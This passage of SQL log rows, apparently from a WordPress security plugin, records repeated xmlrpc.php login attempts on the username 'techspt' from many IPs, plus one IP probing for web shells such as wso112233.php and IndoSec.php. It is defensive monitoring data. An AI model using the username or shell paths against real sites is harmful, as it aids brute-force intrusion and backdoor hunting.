v-site1.com/xmlrpc.php',0,0,0),('198.71.230.31',3326600735,'techspt',0,1679837908.1404,152,'hT8xlu2k7dWAOfD5nRbE1ISq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679837909.0068,152,'4iUbGwq1LPAJhW9YsN5FQM2y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.77.163.64',860726080,'techspt',0,1679837918.5669,152,'rzuZBQmtLx8jnYlwsDGMI61E','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.97.231',3098042855,'techspt',0,1679837933.7908,152,'bcqBS8wUXQPVKu5YephGOtMg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'techspt',0,1679837933.8909,152,'fyn5WJKVaHzxvP6mZpDi2qSA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.65.123.34',1145142050,'techspt',0,1679837943.4788,152,'uOwNDipGtdTmry5BkC2Eo3QU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.64.25.22',759175446,'techspt',0,1679837950.7805,152,'lPpNoqMSGkQRgUTyEsA81ir3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.134.248.235',1535572203,'techspt',0,1679837967.1677,152,'9JsE47mVFdz2oCxPAX1vHcKB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679837972.4071,152,'BcftjJmUW1g2376Z85hrYyav','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'techspt',0,1679841534.3698,152,'XKNuROdr82GYVvZWBk3tJ7jI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.79.177.175',860860847,'techspt',0,1679841536.1964,152,'tR8BqPkZoQWrC3avI9UDeViG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('136.243.219.190',2297682878,'techspt',0,1679841548.3512,152,'9DdSLFONnA4ycev2gqGHPojQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.245.120',2487809400,'techspt',0,1679841552.5925,152,'jblDKaPASBWiVQeGzqEwp7Y9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.146.149',2694419093,'techspt',0,1679841556.2213,152,'JDhm9SVPcX7vZ68Inb1CGjxw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.71.226.185',2806506169,'techspt',0,1679841557.2831,152,'L5WeCNXUMPRGIajly68kTmiK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.28.36.122',1729897594,'techspt',0,1679841561.3919,152,'u9nxGlXBVZTw70dcFamhDYEk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679841563.6394,152,'XStvzA4Pasldj9COwYBkDG5Q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679841567.3150,152,'GgLauUTdCIVMPw3BkRK9DrYl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.230.210',860153554,'techspt',0,1679848922.2978,152,'U98PDFntxcByqzr53C7mY61i','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1679848926.5514,152,'7BeNwS9RCyrAguGqIc5sLfn3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679848933.0268,152,'mbURSKDCykVAvEpiuhwQG5Ne','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'techspt',0,1679848955.2381,152,'3zYABgEqswiT4eO07Lc1jRKS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.245.57.130',2633316738,'techspt',0,1679848955.4956,152,'5SQeklATGEwMgpjhYmRLz8ru','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679848959.0620,152,'uaP3TLnJ4UF6Kky1bBcQMS0o','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'techspt',0,1679848976.6628,152,'KV316Azb0h29PCUWe4DiS8nv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'techspt',0,1679852019.4113,152,'6FxCiwEletQByVa0MX5Prn4z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('216.250.113.146',3640291730,'techspt',0,1679852021.1922,152,'7OcGQjaPszKBWi9RSe3UFumT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'techspt',0,1679852025.7915,152,'KyOi0ahzXef5vYj31EmbprAC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'techspt',0,1679852039.7779,152,'RJKfSXInzyi5gp9QjVWxGw80','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679852052.3849,152,'8EdGPQqzgWISYhkwsV71ClrN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('143.198.157.238',2412158446,'techspt',0,1679852063.7467,152,'QuZhnF1rctpM26IgBV8Rokvl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.205.38.23',3586991639,'techspt',0,1679852064.0466,152,'YTzuSJF6dmglWI95xtoiD31Q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.44.8.48',3391883312,'techspt',0,1679852071.4872,152,'suVjZpP4AkGQmJDg8YnfwqET','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679857944.4383,152,'2lbU7wpHLxeuriFC4SBW8nAm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.244.46',1152578606,'techspt',0,1679857944.5763,152,'AiyGhIrLtDbkUx6dJE5nqpj9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679857948.2357,152,'Gl5PuRH8M7WvXs1j6aqETt3V','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679857956.1707,152,'rYMhy9DbP3LopWjvwXxKfaVH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.155',1255160731,'techspt',0,1679857956.5040,152,'qIdSn1RB6NwT2xbVFvEePH7j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.155',1255160731,'techspt',0,1679857970.8451,152,'bkhSpDsIc7tfW4jyE6nMLmAY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.155',1255160731,'',0,1679857970.8481,10,'bkhSpDsIc7tfW4jyE6nMLmAY','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('209.188.18.190',3518763710,'techspt',0,1679857980.8687,152,'jpwxPgqrmsy28AdINQ4z7U16','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679858469.8638,152,'qD7J09ReFchNmkxU3Mtl6VKn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679858470.2751,152,'1U0tbWRr4f8PynCe9Y3xKTMu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.202',1255160778,'techspt',0,1679858486.5963,152,'PCDRvqctKd24gS7h3e0rnxBl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.38.23.179',3257276339,'',0,1679860627.7648,55,'RZg736fdWbluBSJIU4vzTyhp','','19|0|0|0|cmdev-site1.com/admin/server/php/index.php',0,19,0),('164.92.115.99',2757522275,'techspt',0,1679861813.9465,152,'QlsdKIBG79wj0nxbUORqEzr2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679861813.9468,152,'9wLIKxY8nARbU7DVJ1XOyPT6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.53.55',2809279799,'techspt',0,1679861825.7290,152,'RUMJiGF58vtT01was7oVjk9Q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.170.72.254',1604995326,'techspt',0,1679861832.0558,152,'rMu06Dlbex9fU8BwEjk3HodL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679861843.8106,152,'JmcnaSqM8ftHsAxQIGdjKrBy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.137.65.179',1334395315,'techspt',0,1679861855.3845,152,'h1EknXBGeHoWJFDZ4vlSc37I','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679861870.5689,152,'7POpFfYHBNXlh2yk9WoA6VT8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'',0,1679861870.5711,10,'7POpFfYHBNXlh2yk9WoA6VT8','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('202.61.232.172',3393054892,'techspt',0,1679866150.9902,152,'0rcpaXPkAfh1YK92sUGWiIgB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679866151.6378,152,'MdovpFgkYTVSDmw40XGfirLP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679866166.3730,152,'mAunvRHj3JKkfXY69rEUet7q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'techspt',0,1679866166.4654,152,'6IToj7sxGSPWbYRcr0Fd4CLM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679866173.0048,152,'CpnP5cNFmfudG7AeMVzIb6yj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679866196.0876,152,'FjPa3Np5mlQdhMtK7erGykS0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679866197.2868,152,'H5Owi49zmlrgyPVDq2Xj7cCT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.245.57.130',2633316738,'techspt',0,1679870577.5268,152,'atJGFjRxBwc8iNHvoS6DeOf9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.146',1152553362,'techspt',0,1679870577.8785,152,'ts89LJxw3mDiPEY1qHk0OIFM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679870583.7622,152,'DMCS1LUgV28TBFvo6z9XWZO7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679870588.3479,152,'iDqTd0koYyZm6fgEnJXIWaRV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679870591.2935,152,'eX56Yt0V3hO4DjWnwuRyKMFi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679870602.1530,152,'LfSY9NzQ1pUGvF4eHE8KtRrg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'',0,1679870602.1555,10,'LfSY9NzQ1pUGvF4eHE8KtRrg','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('97.107.133.132',1634436484,'techspt',0,1679874878.5098,152,'V8YkoRF64LXr1hS7dsOinWj9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.146',1152553362,'techspt',0,1679874881.3605,152,'OXjHUm0GuSC4egc612FhtYva','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679874887.0411,152,'OQsktPXrybGFhnKVUHjTJ0gp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679874887.0576,152,'UrWHJQAb895mCfXV4nEsKhYv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679874905.2610,152,'ENx93A4sXBQYPltqekWnaZIy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'',0,1679874905.2650,10,'ENx93A4sXBQYPltqekWnaZIy','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('68.65.123.34',1145142050,'techspt',0,1679874910.6524,152,'wVqju2lIT890KYn7WOiSEHdZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.21',3359272725,'techspt',0,1679874911.9881,152,'wKJ7l5ZHePDXGAu8jChzxdkO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'techspt',0,1679874920.5218,152,'Unr2ZJkLXITiomBjA5SgQ7WY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.21',3359272725,'techspt',0,1679874931.6655,152,'BnOSaF96qfJIYrejPtA7LNcp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.21',3359272725,'',0,1679874931.6693,10,'BnOSaF96qfJIYrejPtA7LNcp','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('167.71.226.185',2806506169,'techspt',0,1679877675.6030,152,'xqmJzwlbBQarIicsHV5voySD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'techspt',0,1679877676.1881,152,'QMEeRhzWaAscIfwdiyNpGZo8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679877680.4188,152,'5ARaUwYD7SxdIrLNWoziXC9g','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679877683.2617,152,'mfjzRFWyl2ibwS84BLdQoZYv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'techspt',0,1679877690.4625,152,'kfCGSdJb1jOM43UoNWVDmRzH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.47.143',2947690383,'techspt',0,1679877690.8114,152,'YV3mUtvDl9b5LWrFpo0fRQes','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.87.111',1386567535,'techspt',0,1679877696.1689,152,'ywhO02FgMivobsup7EQex9nL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.14.102.253',2718852861,'techspt',0,1679877700.6340,152,'M6JaHnuAqPpbldB8o95rRgF0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.42.111.218',1546285018,'techspt',0,1679877709.5457,152,'DzluVA16BxskcWt0dJ7Ebn5h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'',0,1679877711.9060,71,'Oeuvy2Jmtr5kaxpigSnGHsLD','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('185.243.11.71',3119713095,'techspt',0,1679883308.6778,152,'gmF4hGJXByA85IqNi0vufoW2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679883316.4263,152,'Wk1cTOMVID3S4eao6xzvALbR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.38.45.49',908471601,'techspt',0,1679883317.7186,152,'S2lh5j6pM0RvDTtIbdkAoug3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'techspt',0,1679883318.6847,152,'PH1h5x3NswDrRTC7OWVlpfXq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.140.92',1503890524,'techspt',0,1679883331.9129,152,'zWkvPsE4f61qe3mhOJQnjCUd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.166.86.232',3165017832,'techspt',0,1679883336.0130,152,'KoLr3wizRNBc0AMmekHFudOy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679883343.1952,152,'1FWXCpyJL7u49UYMKQwigqNP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679883354.5580,152,'zqhDYUyZncuCd4P3Tvb5kHQl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'',0,1679883354.5627,10,'zqhDYUyZncuCd4P3Tvb5kHQl','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('89.43.65.194',1496007106,'techspt',0,1679883357.0544,152,'1fVItrANMKB2Z5e9J0CbOShP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679887780.8571,152,'24xfCRS5rgpNDGOL7inH0b6d','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679887781.1658,152,'lzgd5t8PrxBia63KwmM7hjID','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.202.137',1152567945,'techspt',0,1679887785.8476,152,'NeimctLJFDE89WHTzjRfSZpk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.38.45.49',908471601,'techspt',0,1679887793.7016,152,'JZGpW4H1vIBiM9CwfxmUVcLA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.107.133.132',1634436484,'techspt',0,1679887794.1365,152,'eTCvF3OPt4gAKoyIiLaj6Dpw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('63.250.38.213',1073358549,'techspt',0,1679887807.9738,152,'kBR845iZ7Pz1xWabfF9H20oG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679887816.7589,152,'oBbSxri5qDU6EO4gY2Pc1ma9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679887824.8485,152,'tZHfdhJQmjaqzSKwg3XOiEbx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679887836.1500,152,'kWRvjopeXdfNHIyK8EPc4tzm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.255.253.114',2919234930,'',0,1679889703.5730,55,'nkGRu4TPwgbH7avZhUDrC9If','','19|0|0|0|cmdev-site1.com//wp-content/plugins/ccx/index.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889704.0588,55,'cwpCkKRDjMstWX5zb3N0m8ir','','19|0|0|0|cmdev-site1.com/ccx/index.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889704.0623,10,'cwpCkKRDjMstWX5zb3N0m8ir','','707|0|0|0|cmdev-site1.com/ccx/index.php',0,707,0),('173.255.253.114',2919234930,'',0,1679889704.5309,55,'4hTjeFiXSpgocBLvZ1bHqd2A','','19|0|0|0|cmdev-site1.com/wp-content/themes/ccx/index.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889704.9903,55,'0sV1zrqae9MGwE2AoHKyYD73','','19|0|0|0|cmdev-site1.com/shell20211028.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889705.4613,55,'6mGUk42yMfZOiLrKpNJQaxgu','','19|0|0|0|cmdev-site1.com/wp-includes/shell20211028.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889705.9625,55,'LNOWnajl9uFP5ebRpCTycH0D','','19|0|0|0|cmdev-site1.com/wp-admin/shell20211028.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889706.4317,55,'18xXr4YFCK7TMyNgaSUfjQGW','','19|0|0|0|cmdev-site1.com/wp-content/shell20211028.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889706.9187,55,'mlCbgitdO8L3GKfj2hPTEncy','','19|0|0|0|cmdev-site1.com/wso112233.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889707.4168,55,'9LmDnOiF31yZ4JIvRPH6UfYt','','19|0|0|0|cmdev-site1.com/wsoyanzorng.php',0,19,0),('173.255.253.114',2919234930,'',0,1679889707.8990,55,'G4Dbl5mOZktpiua2AF8RXMS9','','19|0|0|0|cmdev-site1.com//wp-content/uploads/ac_assets/IndoSec.php%20',0,19,0),('177.125.60.21',2977774613,'techspt',0,1679892368.8575,152,'1Xdn8ySiHJo2khqvmuax9R6B','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'techspt',0,1679892373.9530,152,'iNPrQ8hsOoqFHAaWXy31L7Ef','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1679892375.1536,152,'NMpZOmcGrXeDQwCt65I2bWSu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679892379.2440,152,'7CzPwaNWdvDfVA5JtcTEHbkh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1679892391.1555,152,'CxfSpEdj0zXmIKqHwtO2BsNa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('97.107.133.132',1634436484,'techspt',0,1679892397.4704,152,'ygEidl3zBIQM46CXLhFwUaTx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679892402.2682,152,'gRfwHyepXv7ULdBjEmKClVGq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679896983.7819,152,'Ey4dxuJvAoVbcYeiN0UaR2Gk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.243.52.182',3270718646,'techspt',0,1679896983.7820,152,'y7Q6puNe9ocS5CziGthW4fnY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679896990.9026,152,'VoZWQCyYTe5A6EzB0KP3uN2l','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.147.224',1091933152,'techspt',0,1679896991.2675,152,'SyoP2L4uTZgWdxlaDcHNQ6Vj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.85.137',1386567049,'techspt',0,1679896993.3169,152,'RsqalQu7SibFE6rMzmoWPBtZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.134.248.235',1535572203,'techspt',0,1679897008.6736,152,'HMgs3uAESkCt1dxv0L2ehO67','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'techspt',0,1679901615.3296,152,'U1qw9hRPilnTaA3tmFZvxH0e','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('96.231.235.203',1625811915,'techspt',0,1679901615.9476,152,'294W1KCTINwqFxe6bHdnsukM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'techspt',0,1679901617.4956,152,'oDESJu0OvpMhHmPcUx32Awn8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'techspt',0,1679901623.0697,152,'O8miqQ9REAXsz05K6dD3BVTN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'',0,1679901623.0729,10,'O8miqQ9REAXsz05K6dD3BVTN','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.6.139.121',3104213881,'techspt',0,1679901624.1374,152,'V6sIKU27c3JOdRbPrhukBS9w','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.85.137',1386567049,'techspt',0,1679901632.4125,152,'xvCOaetWwldPuF9AHYX3NS87','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'techspt',0,1679901633.8052,152,'kbrs7HNq0tCOwzn9fZjDxciB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.110.27',3359272475,'techspt',0,1679905423.1674,152,'OvZYd219rkmoSexU4WMIRz3X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'techspt',0,1679905423.4977,152,'yNI63ZK9THUnh2EBJOCSa8xr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'techspt',0,1679906273.7993,152,'dW6XmA41FQH5Jvyu9rG8RMcz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'techspt',0,1679906274.3279,152,'pEhJfwakb89S5XFy0HmuMxGL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'',0,1679906274.3303,10,'pEhJfwakb89S5XFy0HmuMxGL','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('198.71.231.8',3326600968,'techspt',0,1679906278.6611,152,'0KpNux2mQYajDIiHL7PSoGqO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'techspt',0,1679906281.1233,152,'Y6xOg7K1Vp08aRvHob9GuzEX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.40.87.204',1579702220,'techspt',0,1679906289.0185,152,'9XYDt26V5ywHuqhmsCcAL3en','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.244.46',1152578606,'techspt',0,1679906290.9609,152,'aHdINKLqZpzjR21lOCBQ0Frh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679906295.2206,152,'g7D0nlump3rwiFYcCZ5JShtE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.3.113.98',771977570,'techspt',0,1679906307.0803,152,'tmJ6cIf5eULn1uKpkqZVNYvh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.226.45',3326599725,'techspt',0,1679912572.2011,152,'JsRMCyFUHgr1INSqAdTV7km2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679912573.3824,152,'rGpdUcE8kzY6AHJ0S4gbnMsi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.55.225.47',3107447087,'techspt',0,1679912573.8418,152,'troCFOyQkL5KRqixhd72uT8e','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'techspt',0,1679912574.6983,152,'Qk0ePajwIg1G8qAxXJ7nTrt5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.0.232.117',2717968501,'techspt',0,1679912582.0231,152,'AwlcR09JFz6eQvYjCUHPf1nh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1679912585.6734,152,'TGWLUlS56tkcmM3riENdY1Va','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'techspt',0,1679912586.3032,152,'WlIY4duneRNp3SPq5JXOf1bF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679912593.8387,152,'ScGhs9XkpjnrAJ3uOeFzqHaf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679912594.0981,152,'vOnj7LuiY3ZAEfobCGeMlsNV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679912604.6730,152,'jMeRX8TiKp3g2HloVCO415kn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679912613.5790,152,'Cqd5LT4JolQDwUau2YHWN7Ej','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1679912613.9817,152,'LU3Ml7864H5mJZwpiAxNEgVj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'techspt',0,1679917069.2145,152,'lOqMJWUzQawgjYPH3vIAs1C6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679917070.5339,152,'OnAYrSL8vURmlDZoBTKgja5X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679917082.1164,152,'wFleWRDQgYtKC2fzErxcjh9v','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.140.92',1503890524,'techspt',0,1679917104.3400,152,'3gO9crNzQSDJmdWBFqvoCpT2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.205.38.23',3586991639,'techspt',0,1679917106.4610,152,'qI4Bk1PA6Xw90dtDYnymf2Rr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1679917113.3676,152,'JKue8SqGLZpY